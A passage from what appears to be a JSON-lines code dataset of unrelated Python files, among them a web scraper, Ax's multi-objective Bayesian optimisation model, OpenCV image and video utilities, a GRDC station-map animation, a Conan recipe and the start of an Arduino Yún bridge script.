self.spy_items()\n #return self.spy_items_runner()\n\n def spy_items(self):\n\n process = CrawlerProcess(get_project_settings())\n\n process.crawl(Spider,\n entry_url=self.entry_url,\n document_xpath=self.document_xpath,\n image_xpath=self.image_xpath,\n allow_rule=self.allow_rule,\n deny_rule=self.deny_rule,\n page_limit=self.page_limit,\n request_id=self.request_id,\n job_id=self.job_id,\n exclude_reg=self.exclude_reg\n )\n\n process.start()\n #process.start(stop_after_crawl=False)\n #process.stop()\n return\n\n def spy_items_runner(self):\n\n self.sitemap_urls = [self.sitemap_url, ]\n\n def f(q):\n try:\n runner = crawler.CrawlerRunner(get_project_settings())\n deferred = runner.crawl(spider,\n entry_url=self.entry_url,\n document_xpath=self.document_xpath,\n image_xpath=self.image_xpath,\n allow_rule=self.allow_rule,\n deny_rule=self.deny_rule,\n page_limit=self.page_limit,\n exclude_reg=self.exclude_reg\n )\n deferred.addBoth(lambda _: reactor.stop())\n reactor.run()\n q.put(None)\n except Exception as e:\n q.put(e)\n\n q = Queue()\n p = Process(target=f, args=(q,))\n p.start()\n result = q.get()\n p.join()\n\n if result is not None:\n raise result\n\n return \"{}\"\n","repo_name":"makotunes/easy-customizable-scraper","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":22516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17465518413","text":"from logging import Logger\nfrom typing import Any, Callable, Dict, List, Optional, Tuple\n\nimport torch\nfrom ax.core.search_space import SearchSpaceDigest\nfrom ax.exceptions.core import AxError\nfrom ax.models.torch.botorch import (\n BotorchModel,\n get_rounding_func,\n TBestPointRecommender,\n TModelConstructor,\n TModelPredictor,\n TOptimizer,\n)\nfrom ax.models.torch.botorch_defaults import (\n get_and_fit_model,\n recommend_best_observed_point,\n scipy_optimizer,\n TAcqfConstructor,\n)\nfrom ax.models.torch.botorch_moo_defaults import (\n get_qLogNEHVI,\n infer_objective_thresholds,\n pareto_frontier_evaluator,\n scipy_optimizer_list,\n)\nfrom ax.models.torch.frontier_utils import TFrontierEvaluator\nfrom ax.models.torch.utils import (\n _get_X_pending_and_observed,\n _to_inequality_constraints,\n predict_from_model,\n randomize_objective_weights,\n subset_model,\n)\nfrom ax.models.torch_base import TorchGenResults, TorchModel, TorchOptConfig\nfrom ax.utils.common.constants import Keys\nfrom ax.utils.common.docutils import copy_doc\nfrom ax.utils.common.logger import get_logger\nfrom ax.utils.common.typeutils import checked_cast, not_none\nfrom botorch.acquisition.acquisition import AcquisitionFunction\nfrom botorch.models.model import Model\nfrom torch import Tensor\n\n\nlogger: Logger = get_logger(__name__)\n\n# pyre-fixme[33]: Aliased annotation cannot contain `Any`.\nTOptimizerList = Callable[\n [\n List[AcquisitionFunction],\n Tensor,\n Optional[List[Tuple[Tensor, Tensor, float]]],\n Optional[Dict[int, float]],\n Optional[Callable[[Tensor], Tensor]],\n Any,\n ],\n Tuple[Tensor, Tensor],\n]\n\n\nclass MultiObjectiveBotorchModel(BotorchModel):\n r\"\"\"\n Customizable multi-objective model.\n\n By default, this uses an Expected Hypervolume Improvment function to find the\n pareto frontier of a function with multiple outcomes. This behavior\n can be modified by providing custom implementations of the following\n components:\n\n - a `model_constructor` that instantiates and fits a model on data\n - a `model_predictor` that predicts outcomes using the fitted model\n - a `acqf_constructor` that creates an acquisition function from a fitted model\n - a `acqf_optimizer` that optimizes the acquisition function\n\n Args:\n model_constructor: A callable that instantiates and fits a model on data,\n with signature as described below.\n model_predictor: A callable that predicts using the fitted model, with\n signature as described below.\n acqf_constructor: A callable that creates an acquisition function from a\n fitted model, with signature as described below.\n acqf_optimizer: A callable that optimizes an acquisition\n function, with signature as described below.\n\n\n\n Call signatures:\n\n ::\n\n model_constructor(\n Xs,\n Ys,\n Yvars,\n task_features,\n fidelity_features,\n metric_names,\n state_dict,\n **kwargs,\n ) -> model\n\n Here `Xs`, `Ys`, `Yvars` are lists of tensors (one element per outcome),\n `task_features` identifies columns of Xs that should be modeled as a task,\n `fidelity_features` is a list of ints that specify the positions of fidelity\n parameters in 'Xs', `metric_names` provides the names of each `Y` in `Ys`,\n `state_dict` is a pytorch module state dict, and `model` is a BoTorch `Model`.\n Optional kwargs are being passed through from the `BotorchModel` constructor.\n This callable is assumed to return a fitted BoTorch model that has the same\n dtype and lives on the same device as the input tensors.\n\n ::\n\n model_predictor(model, X) -> [mean, cov]\n\n Here `model` is a fitted botorch model, `X` is a tensor of candidate points,\n and `mean` and `cov` are the posterior mean and covariance, respectively.\n\n ::\n\n acqf_constructor(\n model,\n objective_weights,\n outcome_constraints,\n X_observed,\n X_pending,\n **kwargs,\n ) -> acq_function\n\n\n Here `model` is a botorch `Model`, `objective_weights` is a tensor of weights\n for the model outputs, `outcome_constraints` is a tuple of tensors describing\n the (linear) outcome constraints, `X_observed` are previously observed points,\n and `X_pending` are points whose evaluation is pending. `acq_function` is a\n BoTorch acquisition function crafted from these inputs. For additional\n details on the arguments, see `get_qLogNEHVI`.\n\n ::\n\n acqf_optimizer(\n acq_function,\n bounds,\n n,\n inequality_constraints,\n fixed_features,\n rounding_func,\n **kwargs,\n ) -> candidates\n\n Here `acq_function` is a BoTorch `AcquisitionFunction`, `bounds` is a tensor\n containing bounds on the parameters, `n` is the number of candidates to be\n generated, `inequality_constraints` are inequality constraints on parameter\n values, `fixed_features` specifies features that should be fixed during\n generation, and `rounding_func` is a callback that rounds an optimization\n result appropriately. `candidates` is a tensor of generated candidates.\n For additional details on the arguments, see `scipy_optimizer`.\n\n ::\n\n frontier_evaluator(\n model,\n objective_weights,\n objective_thresholds,\n X,\n Y,\n Yvar,\n outcome_constraints,\n )\n\n Here `model` is a botorch `Model`, `objective_thresholds` is used in hypervolume\n evaluations, `objective_weights` is a tensor of weights applied to the objectives\n (sign represents direction), `X`, `Y`, `Yvar` are tensors, `outcome_constraints` is\n a tuple of tensors describing the (linear) outcome constraints.\n \"\"\"\n\n dtype: Optional[torch.dtype]\n device: Optional[torch.device]\n Xs: List[Tensor]\n Ys: List[Tensor]\n Yvars: List[Tensor]\n\n def __init__(\n self,\n model_constructor: TModelConstructor = get_and_fit_model,\n model_predictor: TModelPredictor = predict_from_model,\n # pyre-fixme[9]: acqf_constructor has type `Callable[[Model, Tensor,\n # Optional[Tuple[Tensor, Tensor]], Optional[Tensor], Optional[Tensor], Any],\n # AcquisitionFunction]`; used as `Callable[[Model, Tensor,\n # Optional[Tuple[Tensor, Tensor]], Optional[Tensor], Optional[Tensor],\n # **(Any)], AcquisitionFunction]`.\n acqf_constructor: TAcqfConstructor = get_qLogNEHVI,\n # pyre-fixme[9]: acqf_optimizer has type `Callable[[AcquisitionFunction,\n # Tensor, int, Optional[Dict[int, float]], Optional[Callable[[Tensor],\n # Tensor]], Any], Tensor]`; used as `Callable[[AcquisitionFunction, Tensor,\n # int, Optional[Dict[int, float]], Optional[Callable[[Tensor], Tensor]],\n # **(Any)], Tensor]`.\n acqf_optimizer: TOptimizer = scipy_optimizer,\n # TODO: Remove best_point_recommender for botorch_moo. Used in modelbridge._gen.\n best_point_recommender: TBestPointRecommender = recommend_best_observed_point,\n frontier_evaluator: TFrontierEvaluator = pareto_frontier_evaluator,\n refit_on_cv: bool = False,\n refit_on_update: bool = True,\n warm_start_refitting: bool = False,\n use_input_warping: bool = False,\n use_loocv_pseudo_likelihood: bool = False,\n prior: Optional[Dict[str, Any]] = None,\n **kwargs: Any,\n ) -> None:\n self.model_constructor = model_constructor\n self.model_predictor = model_predictor\n self.acqf_constructor = acqf_constructor\n self.acqf_optimizer = acqf_optimizer\n self.best_point_recommender = best_point_recommender\n self.frontier_evaluator = frontier_evaluator\n # pyre-fixme[4]: Attribute must be annotated.\n self._kwargs = kwargs\n self.refit_on_cv = refit_on_cv\n self.refit_on_update = refit_on_update\n self.warm_start_refitting = warm_start_refitting\n self.use_input_warping = use_input_warping\n self.use_loocv_pseudo_likelihood = use_loocv_pseudo_likelihood\n self.prior = prior\n self.model: Optional[Model] = None\n self.Xs = []\n self.Ys = []\n self.Yvars = []\n self.dtype = None\n self.device = None\n self.task_features: List[int] = []\n self.fidelity_features: List[int] = []\n self.metric_names: List[str] = []\n\n @copy_doc(TorchModel.gen)\n def gen(\n self,\n n: int,\n search_space_digest: SearchSpaceDigest,\n torch_opt_config: TorchOptConfig,\n ) -> TorchGenResults:\n options = torch_opt_config.model_gen_options or {}\n acf_options = options.get(\"acquisition_function_kwargs\", {})\n optimizer_options = options.get(\"optimizer_kwargs\", {})\n\n if search_space_digest.fidelity_features: # untested\n raise NotImplementedError(\n \"fidelity_features not implemented for base BotorchModel\"\n )\n if (\n torch_opt_config.objective_thresholds is not None\n and torch_opt_config.objective_weights.shape[0]\n != not_none(torch_opt_config.objective_thresholds).shape[0]\n ):\n raise AxError(\n \"Objective weights and thresholds most both contain an element for\"\n \" each modeled metric.\"\n )\n\n X_pending, X_observed = _get_X_pending_and_observed(\n Xs=self.Xs,\n objective_weights=torch_opt_config.objective_weights,\n bounds=search_space_digest.bounds,\n pending_observations=torch_opt_config.pending_observations,\n outcome_constraints=torch_opt_config.outcome_constraints,\n linear_constraints=torch_opt_config.linear_constraints,\n fixed_features=torch_opt_config.fixed_features,\n )\n\n model = not_none(self.model)\n full_objective_thresholds = torch_opt_config.objective_thresholds\n full_objective_weights = torch_opt_config.objective_weights\n full_outcome_constraints = torch_opt_config.outcome_constraints\n # subset model only to the outcomes we need for the optimization\n if options.get(Keys.SUBSET_MODEL, True):\n subset_model_results = subset_model(\n model=model,\n objective_weights=torch_opt_config.objective_weights,\n outcome_constraints=torch_opt_config.outcome_constraints,\n objective_thresholds=torch_opt_config.objective_thresholds,\n )\n model = subset_model_results.model\n objective_weights = subset_model_results.objective_weights\n outcome_constraints = subset_model_results.outcome_constraints\n objective_thresholds = subset_model_results.objective_thresholds\n idcs = subset_model_results.indices\n else:\n objective_weights = torch_opt_config.objective_weights\n outcome_constraints = torch_opt_config.outcome_constraints\n objective_thresholds = torch_opt_config.objective_thresholds\n idcs = None\n\n bounds_ = torch.tensor(\n search_space_digest.bounds, dtype=self.dtype, device=self.device\n )\n bounds_ = bounds_.transpose(0, 1)\n botorch_rounding_func = get_rounding_func(torch_opt_config.rounding_func)\n if acf_options.pop(\"random_scalarization\", False) or acf_options.get(\n \"chebyshev_scalarization\", False\n ):\n # If using a list of acquisition functions, the algorithm to generate\n # that list is configured by acquisition_function_kwargs.\n if \"random_scalarization_distribution\" in acf_options:\n randomize_weights_kws = {\n \"random_scalarization_distribution\": acf_options[\n \"random_scalarization_distribution\"\n ]\n }\n del acf_options[\"random_scalarization_distribution\"]\n else:\n randomize_weights_kws = {}\n objective_weights_list = [\n randomize_objective_weights(objective_weights, **randomize_weights_kws)\n for _ in range(n)\n ]\n acquisition_function_list = [\n self.acqf_constructor(\n model=model,\n objective_weights=objective_weights,\n outcome_constraints=outcome_constraints,\n X_observed=X_observed,\n X_pending=X_pending,\n **acf_options,\n )\n for objective_weights in objective_weights_list\n ]\n acquisition_function_list = [\n checked_cast(AcquisitionFunction, acq_function)\n for acq_function in acquisition_function_list\n ]\n # Multiple acquisition functions require a sequential optimizer\n # always use scipy_optimizer_list.\n # TODO(jej): Allow any optimizer.\n candidates, expected_acquisition_value = scipy_optimizer_list(\n acq_function_list=acquisition_function_list,\n bounds=bounds_,\n inequality_constraints=_to_inequality_constraints(\n linear_constraints=torch_opt_config.linear_constraints\n ),\n fixed_features=torch_opt_config.fixed_features,\n rounding_func=botorch_rounding_func,\n **optimizer_options,\n )\n else:\n if (\n objective_thresholds is None\n or objective_thresholds[objective_weights != 0].isnan().any()\n ):\n full_objective_thresholds = infer_objective_thresholds(\n model=model,\n X_observed=not_none(X_observed),\n objective_weights=full_objective_weights,\n outcome_constraints=full_outcome_constraints,\n subset_idcs=idcs,\n objective_thresholds=objective_thresholds,\n )\n # subset the objective thresholds\n objective_thresholds = (\n full_objective_thresholds\n if idcs is None\n else full_objective_thresholds[idcs].clone()\n )\n acquisition_function = self.acqf_constructor(\n model=model,\n objective_weights=objective_weights,\n objective_thresholds=objective_thresholds,\n outcome_constraints=outcome_constraints,\n X_observed=X_observed,\n X_pending=X_pending,\n **acf_options,\n )\n acquisition_function = checked_cast(\n AcquisitionFunction, acquisition_function\n )\n # pyre-ignore: [28]\n candidates, expected_acquisition_value = self.acqf_optimizer(\n acq_function=checked_cast(AcquisitionFunction, acquisition_function),\n bounds=bounds_,\n n=n,\n inequality_constraints=_to_inequality_constraints(\n linear_constraints=torch_opt_config.linear_constraints\n ),\n fixed_features=torch_opt_config.fixed_features,\n rounding_func=botorch_rounding_func,\n **optimizer_options,\n )\n gen_metadata = {\n \"expected_acquisition_value\": expected_acquisition_value.tolist(),\n \"objective_weights\": full_objective_weights.cpu(),\n }\n if full_objective_thresholds is not None:\n gen_metadata[\"objective_thresholds\"] = full_objective_thresholds.cpu()\n return TorchGenResults(\n points=candidates.detach().cpu(),\n weights=torch.ones(n, dtype=self.dtype),\n gen_metadata=gen_metadata,\n )\n","repo_name":"facebook/Ax","sub_path":"ax/models/torch/botorch_moo.py","file_name":"botorch_moo.py","file_ext":"py","file_size_in_byte":16067,"program_lang":"python","lang":"en","doc_type":"code","stars":2182,"dataset":"github-code","pt":"77"} +{"seq_id":"3431349899","text":"import skimage\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n# Lade das Bild\npltimage = skimage.io.imread(\"~/Schreibtisch/lenna_2048.png\", as_gray=True)\n\n# Konvertiere das Bild in ein NumPy-Array\npltimage = np.array(pltimage)\n\n# Berechne die Höhe des Plots\nheight = pltimage.mean()\n\n# Erstelle ein 3D-Plot\nfig = plt.figure()\nax = fig.add_subplot(111, projection=\"3d\")\n\n# Berechne die X- und Y-Koordinaten der Punkte\nx = np.arange(pltimage.shape[0])\ny = np.arange(pltimage.shape[1])\n\n# Erstelle ein Raster aus den X- und Y-Koordinaten\nX, Y = np.meshgrid(x, y)\n\n# Erstelle ein Array mit den Höhen der Punkte\nZ = pltimage / height\n\n# Zeichne das 3D-Raster\nax.plot_surface(X, Y, Z, cmap=\"gray\")\n\n# Zeige den Plot an\nplt.show()","repo_name":"skranz0/mustererkennung","sub_path":"lenna3d.py","file_name":"lenna3d.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24708711898","text":"#!/usr/bin/env python\n\nimport os\nimport cv2\nimport re\nimport sys\nfrom PIL import Image\n\n\ndef frame_dir():\n try:\n return sys.argv[1]\n except:\n return os.getcwd()\n\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\n\ndef natural_keys(text):\n '''\n source: https://stackoverflow.com/a/5967539\n '''\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n\n\ndef listframes(path_with_frames):\n _listframes = [img for img in os.listdir(path_with_frames)\n if img.endswith(\".jpg\") or\n img.endswith(\".jpeg\") or\n img.endswith(\".png\")]\n _listframes.sort(key=natural_keys)\n return _listframes\n\n\ndef get_video_size(path_with_frames, list_of_frames):\n mean_height = 0\n mean_width = 0\n num_of_images = len(list_of_frames)\n\n for frame in list_of_frames:\n width, height = Image.open(os.path.join(path_with_frames, frame)).size\n mean_height += height\n mean_width += width\n\n mean_height /= num_of_images\n mean_width /= num_of_images\n return (int(mean_width), int(mean_height))\n\n\ndef resize_frames(path_with_frames, list_of_frames, size):\n for frame in list_of_frames:\n framepath = os.path.join(path_with_frames, frame)\n im = Image.open(framepath)\n\n imResize = im.resize(size, Image.ANTIALIAS)\n imResize.save(framepath, 'PNG', quality = 100) # setting quality\n # printing each resized image name\n print(\"resized:\", frame)\n\n\ndef generate_video(path_with_frames, list_of_frames, video_file, size):\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n\n video = cv2.VideoWriter(video_file, fourcc, FRAMES_PER_SECOND, size, True)\n\n last_framepath = None\n for frame in list_of_frames:\n print(\"adding frame:\", frame)\n framepath = os.path.join(path_with_frames, frame)\n video.write(cv2.imread(framepath))\n last_framepath = framepath\n for _ in range(REPEAT_LAST_FRAME_FOR_COUNT):\n video.write(cv2.imread(last_framepath))\n\n cv2.destroyAllWindows() # Deallocating memories taken for window creation\n video.release() # releasing the video generated\n\ndef main():\n path_with_frames = frame_dir()\n all_frames = listframes(path_with_frames)\n if all_frames == None or len(all_frames) == 0:\n print(\"found no frames at %s\" % (path_with_frames))\n sys.exit(1)\n video_size = get_video_size(path_with_frames, all_frames)\n resize_frames(path_with_frames, all_frames, video_size)\n generate_video(path_with_frames, all_frames, VIDEO_NAME, video_size)\n\n\nFRAMES_PER_SECOND = 24 ## common across scripts\nVIDEO_NAME = '/tmp/mygeneratedvideo.avi'\nREPEAT_LAST_FRAME_FOR_COUNT = 48\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"abhishekkr/lyrical-video-generator","sub_path":"create-video.py","file_name":"create-video.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"70627329530","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 26 10:17:15 2016\n\nGet operational stations from the Global Runoff Data Centre (GRDC)\nper year and their distribution\n\n@author: Marc.Girons\n\"\"\"\n\nimport os\nimport glob\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom io import BytesIO\nfrom zipfile import ZipFile\nimport matplotlib.pyplot as plt\nfrom matplotlib import animation\nfrom urllib.request import urlopen\nfrom matplotlib.lines import Line2D\nfrom mpl_toolkits.basemap import Basemap\n\n# %%\n\n\ndef extract_from_url(zipurl, path):\n \"\"\"extract a zip file to the cwd given its url address\n \"\"\"\n\n print('Fetching and unzipping file...')\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n with urlopen(zipurl) as zipresp:\n with ZipFile(BytesIO(zipresp.read())) as zfile:\n zfile.extractall(path)\n\n\ndef parse_grdc_file(path):\n \"\"\"import the grdc stations excel file to a pandas dataframe and\n convert a number of columns to the suitable data type\n \"\"\"\n\n print('Parsing file...')\n\n filename = glob.glob(path + '*GRDC_Stations.xlsx')[0]\n\n with open(filename, 'rb') as excelfile:\n data = pd.read_excel(excelfile, sheetname='grdc_metadata', index_col=0)\n\n num_cols = ['d_start', 'd_end', 'd_yrs', 'd_miss',\n 'm_start', 'm_end', 'm_yrs', 'm_miss']\n\n dt_cols = ['f_import', 'l_import']\n\n for column in num_cols:\n data[column] = pd.to_numeric(data[column], errors='coerce')\n\n for column in dt_cols:\n data[column] = pd.to_datetime(data[column], format='%d.%m.%Y')\n\n return data\n\n\ndef get_data_period(data):\n \"\"\"return the measurement start and end years as well as the\n associated period\n \"\"\"\n\n print('Establishing data period...')\n\n m_start = np.min(data['m_start'])\n m_end = np.max(data['m_end'])\n\n period = np.arange(m_start, m_end).astype(int)\n\n return m_start, m_end, period\n\n\ndef count_stations(data, period):\n \"\"\"count the available grdc stations for a given year\n \"\"\"\n\n print('Calculating yearly available stations...')\n\n stations = np.zeros_like(period)\n\n for index_p, year in enumerate(period):\n for index_s, station in enumerate(data.index):\n if (year >= data['m_start'].iloc[index_s] and\n year <= data['m_end'].iloc[index_s]):\n stations[index_p] += 1\n\n return stations\n\n\ndef get_station_locations(data, period):\n \"\"\"get the coordinates of the grdc stations operational in\n a given year\n \"\"\"\n\n print('Processing available stations locations...')\n\n locations = {}\n\n for year in period:\n ls = []\n for index_s, station in enumerate(data.index):\n if (year >= data['m_start'].iloc[index_s] and\n year <= data['m_end'].iloc[index_s]):\n lat = data['lat'].iloc[index_s]\n lon = data['long'].iloc[index_s]\n coors = (lon, lat)\n ls.append(coors)\n locations[year] = np.array(ls)\n\n return locations\n\n\nclass SubplotAnimation(animation.TimedAnimation):\n\n def __init__(self, stations, locations, period):\n\n print('Plotting figure...')\n\n fig = plt.figure(figsize=(12, 4))\n ax1 = plt.subplot2grid((1, 3), (0, 0))\n ax2 = plt.subplot2grid((1, 3), (0, 1), colspan=2)\n\n self.stations = stations\n self.locations = locations\n self.period = period\n\n ax1.set_xlabel('Time (year)')\n ax1.set_ylabel('GRDC stations')\n self.time = Line2D([], [], color='#FF8000', linewidth=3)\n ax1.add_line(self.time)\n ax1.set_xlim(m_start, m_end)\n ax1.set_ylim(0, 5000)\n\n m = Basemap(projection='cyl', llcrnrlat=-90, urcrnrlat=90,\n llcrnrlon=-180, urcrnrlon=180, resolution='l')\n m.fillcontinents(color='0.8')\n # m.drawmapboundary(linewidth=1)\n m.drawrivers(linewidth=0.2, color='C0')\n m.drawcountries(linewidth=0.4, color='w')\n self.space = m.plot([], [], markersize=3, linestyle='None',\n marker='o', color='#FF8000',\n markeredgecolor='none')[0]\n ax2.add_line(self.space)\n ax2.set_xlabel('GRDC stations')\n self.text = ax2.text(150, 75, '', fontsize=12)\n\n fig.tight_layout()\n\n animation.TimedAnimation.__init__(self, fig, interval=100, blit=True)\n\n def _draw_frame(self, framedata):\n\n i = framedata\n self.time.set_data(self.period[:i], self.stations[:i])\n\n year = self.period[i]\n lons = self.locations[year][:, 0]\n lats = self.locations[year][:, 1]\n self.space.set_data(lons, lats)\n\n self.text.set_text(str(year))\n\n self._drawn_artists = [self.time, self.space, self.text]\n\n def new_frame_seq(self):\n return iter(range(self.period.size))\n\n def _init_draw(self):\n self.time.set_data([], [])\n self.space.set_data([], [])\n self.text.set_text('')\n\n# %%\n\nif __name__ == '__main__':\n\n zipurl = ('http://www.bafg.de/GRDC/EN/02_srvcs/21_tmsrs/211_ctlgs/' +\n 'GRDC_Stations.zip?__blob=publicationFile')\n\n path = os.getcwd() + '\\\\..\\\\tmp\\\\'\n\n extract_from_url(zipurl, path)\n data = parse_grdc_file(path)\n m_start, m_end, period = get_data_period(data)\n stations = count_stations(data, period)\n locations = get_station_locations(data, period)\n\n ani = SubplotAnimation(stations, locations, period)\n\n ani.save(os.getcwd() + '\\\\..\\\\GRDC_time_lapse.mp4', dpi=300)\n\n shutil.rmtree(path)\n\n plt.show()\n","repo_name":"GironsLopez/GRDC-visualization","sub_path":"src/GRDC-visualization.py","file_name":"GRDC-visualization.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31961086445","text":"from conan import ConanFile\nfrom conan.tools.files import get, copy\nfrom conan.tools.layout import basic_layout\nimport os\n\n\nrequired_conan_version = \">=1.50.0\"\n\n\nclass PackageConan(ConanFile):\n name = \"psyinf-gmtl\"\n description = \"The Generic Math Template Library. A math library designed to be high-performance, extensible, and generic.\"\n license = \"LGPL-2.1-only\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://github.com/psyinf/gmtl\"\n topics = (\"linear-algebra\", \"collision\", \"vector\", \"matrix\", \"template\", \"math\", \"header-only\")\n settings = \"os\", \"arch\", \"compiler\", \"build_type\" \n no_copy_source = True \n \n def layout(self):\n basic_layout(self, src_folder=\"src\")\n\n def package_id(self):\n self.info.clear()\n\n def source(self):\n get(self, **self.conan_data[\"sources\"][self.version], destination=self.source_folder, strip_root=True)\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(self, pattern=\"COPYING\", dst=os.path.join(self.package_folder, \"licenses\"), src=self.source_folder)\n copy(\n self,\n pattern=\"*.h\",\n dst=os.path.join(self.package_folder, \"include\"),\n src=self.source_folder,\n )\n\n def package_info(self):\n self.cpp_info.bindirs = []\n self.cpp_info.libdirs = []\n self.cpp_info.names[\"cmake_find_package\"] = \"gmtl\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"gmtl\"\n \n self.cpp_info.set_property(\"cmake_file_name\", \"gmtl\")\n self.cpp_info.set_property(\"cmake_target_name\", \"gmtl::gmtl\")\n self.cpp_info.set_property(\"pkg_config_name\", \"gmtl\")\n\n \n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/psyinf-gmtl/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"4006001086","text":"#!/usr/bin/python3\n\"\"\" This is the State Module for HBNB project \"\"\"\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import Column, String\nfrom sqlalchemy.orm import relationship\nfrom os import getenv\n\n\nclass State(BaseModel, Base):\n \"\"\"Is the State class\"\"\"\n __tablename__ = 'states'\n if getenv('HBNB_TYPE_STORAGE') == 'db':\n name = Column(String(128), nullable=False)\n cities = relationship('City', backref=\"state\",\n cascade=\"all, delete, delete-orphan\")\n else:\n name = \"\"\n\n @property\n def cities(self):\n \"\"\"Getter\"\"\"\n from models import storage\n from models.city import City\n all_cities = []\n for city_obj in storage.all(City).values():\n # key = key.split(\".\")[0]\n # if key == \"City\" and city_obj.state_id == self.id:\n if city_obj.state_id == self.id:\n all_cities.append(city_obj)\n return all_cities\n","repo_name":"pepe-sm/AirBnB_clone_v2","sub_path":"models/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"21375406401","text":"\n'''\n'''\n\nimport cv2\nimport numpy as np\nimport urllib\n\n'''\nhttps://github.com/alexleavitt/uscplayspokemon/blob/master/tommycam.py\n'''\ndef get_video_capture_frame(video_capture_url_jpg_str):\n img_request = urllib.request.urlopen(video_capture_url_jpg_str)\n img_arr = np.asarray(bytearray(img_request.read()), dtype=np.uint8) \n original_frame = cv2.imdecode(img_arr,-1)\n return original_frame\n\n'''\nhttps://docs.opencv.org/master/d7/d4d/tutorial_py_thresholding.html\n'''\ndef threshold_frame(img_frame, min_threshold):\n ret, thresholded_frame = cv2.threshold(img_frame, min_threshold, 255, cv2.THRESH_BINARY)\n return thresholded_frame\n\n\n'''\nhttps://docs.opencv.org/master/d4/d13/tutorial_py_filtering.html\nhttps://docs.opencv.org/master/d4/d86/group__imgproc__filter.html#ga9d7064d478c95d60003cf839430737ed\n'''\ndef remove_noise(img_frame):\n result = img_frame\n result = cv2.bilateralFilter(result,16,32,32) \n \n kernel = np.ones((2, 2),np.uint8)\n result = cv2.morphologyEx(result, cv2.MORPH_OPEN, kernel) \n \n kernel = np.ones((9, 9),np.uint8)\n result = cv2.morphologyEx(result, cv2.MORPH_CLOSE, kernel)\n \n result = cv2.bilateralFilter(result,3,16,16)\n return result\n\n'''\nhttps://docs.opencv.org/master/df/d9d/tutorial_py_colorspaces.html\nhttps://stackoverflow.com/questions/56905592/automatic-contrast-and-brightness-adjustment-of-a-color-photo-of-a-sheet-of-pape????\n'''\ndef blue_color_mask(img_frame):\n result = img_frame \n \n result = cv2.convertScaleAbs(result, alpha=1.95, beta=0)\n \n result = cv2.cvtColor(result, cv2.COLOR_BGR2HSV)\n lower_blue = np.array([70,70,80])\n upper_blue = np.array([140,255,255])\n result = cv2.inRange(result, lower_blue, upper_blue)\n return result\n\ndef filter_blue_bricks(img_frame):\n result = img_frame\n # result = remove_noise(result)\n result = blue_color_mask(result)\n result = fint_brick_center(result) \n return result\n\ndef filter_red_bricks(img_frame):\n result = img_frame\n # result = filter_excess_red_frame(img_frame)\n result = threshold_frame(result, 200)\n #result = remove_noise(result)\n result = fint_brick_center(result) \n return result\n\ndef fint_brick_center(img_frame):\n result = img_frame\n contours, hierarchy = cv2.findContours(result.astype('uint8'), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for brick in contours:\n areal = cv2.contourArea(brick)\n if(areal > 1500):\n M = cv2.moments(brick)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n result = cv2.circle(result,(cx, cy),10,(0,255,0))\n elif(areal > 600):\n M = cv2.moments(brick)\n cx = int(M['m10']/M['m00'])\n cy = int(M['m01']/M['m00'])\n result = cv2.circle(result,(cx, cy),5,(0,255,0))\n return result\n \nwhile True:\n dlink_video_jpg_url = 'http://192.168.0.20/image.jpg'\n dlink_video_jpg_url2 = 'http://192.168.0.21/image.jpg'\n img = get_video_capture_frame(dlink_video_jpg_url)\n cropped_img = img[42:img.shape[0]-80, 0:img.shape[1]] # crop so it only shows table\n \n blue_bricks = filter_blue_bricks(cropped_img)\n cv2.imshow('blue', blue_bricks) \n \n # red_bricks = filter_red_bricks(cropped_img)\n # cv2.imshow('red', red_bricks)\n \n #img2 = get_video_capture_frame(dlink_video_jpg_url2)\n #cv2.imshow('vid2', img2)\n if cv2.waitKey(1) != -1:\n break\n \n","repo_name":"grottrup/crustcrawler","sub_path":"nodes/vision_utilities.py","file_name":"vision_utilities.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25100357112","text":"import select\nimport socket\nimport sys\nimport Queue\nimport logging\nimport logging.handlers\nimport fcntl\nimport os\nimport signal\nimport argparse\nimport queuehandler\nimport termios\nimport atexit\n\n# Add usage and arguments for our options\nparser = argparse.ArgumentParser(description='New Bridge for Arduino Yún')\n\nparser.add_argument(\n '-q', '--quiet',\n action='store_true',\n help=\"don't print anything to the console\",\n default=False)\n\nparser.add_argument(\n '-d', '--debug',\n action='store_true',\n help='increase logging level (both to console and logfile)',\n default=False)\n\nparser.add_argument(\n '-P', '--port',\n type=int,\n help='local TCP port to listen on (default: 6571)',\n default=6571)\n\nparser.add_argument(\n '-l', '--log',\n help='file to log debugging to')\n\nargs = parser.parse_args()\n\n# Function to enable/disable local terminal echo.\ndef enable_echo(fd, enabled):\n (iflag, oflag, cflag, lflag, ispeed, ospeed, cc) \\\n = 